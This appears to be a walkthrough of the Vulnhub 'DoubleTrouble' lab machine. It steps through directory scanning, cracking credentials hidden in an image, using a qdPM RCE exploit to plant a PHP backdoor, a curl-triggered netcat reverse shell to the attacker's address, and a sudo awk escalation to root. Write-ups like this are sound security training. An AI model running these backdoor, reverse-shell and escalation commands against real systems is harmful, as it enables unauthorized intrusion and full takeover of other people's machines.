Vulnhub DoubleTrouble Walkthrough
https://www.vulnhub.com/entry/doubletrouble-1,743/
Scan port 80.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
403,404,500 --wildcard -o 80.log
===============================================================
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.100/uploads/]
/images (Status: 301) [Size: 317] [--> http://192.168.56.100/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
/template (Status: 301) [Size: 319] [--> http://192.168.56.100/template/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.100/core/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.100/install/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
/index.php (Status: 200) [Size: 5814]
/check.php (Status: 200) [Size: 0]
/sf (Status: 301) [Size: 313] [--> http://192.168.56.100/sf/]
/readme.txt (Status: 200) [Size: 470]
/robots.txt (Status: 200) [Size: 26]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.100/secret/]
<!--more-->
In /secret, download doubletrouble.jpg, get password and creds.txt.
~ stegseek --crack -sf doubletrouble.jpg
StegSeek version 0.5
Progress: 2.00% (2794835 bytes)
[i] --> Found passphrase: "92camaro"
[i] Original filename: "creds.txt"
[i] Extracting to "doubletrouble.jpg.out"
~ mv doubletrouble.jpg.out creds.txt
~ cat creds.txt otisrush@localhost.com
otis666⏎ Search exploit of qdPM.
```bash
~ searchsploit qdPM
Exploit Title | Path
...
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py ...
Use POC to upload backdoor.
```bash
~ python3 50175.py --host 'http://192.168.56.100/' -u otisrush@localhost.com -p otis666 python3-0 | 1 [14:53:09]
You are not able to use the designated admin account because they do not have a myAccount page.
Backdoor uploaded at - > http://192.168.56.100//uploads/users/?cmd=whoamiCheck if backdoor works OK.
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=whoami'
<pre>www-data
</pre>⏎ Get reverse shell.
```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash';
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:53330.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$
Check sudo -l.
```bash
www-data@doubletrouble:/home$ ls -la
ls -la
total 8
drwxr-xr-x 2 root root 4096 Sep 11 13:51 .
drwxr-xr-x 18 root root 4096 Dec 17 2020 ..
www-data@doubletrouble:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awkGet root.
www-data@doubletrouble:/home$ sudo awk 'BEGIN {system("/bin/sh")}'
sudo awk 'BEGIN {system("/bin/sh")}'
# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
doubletrouble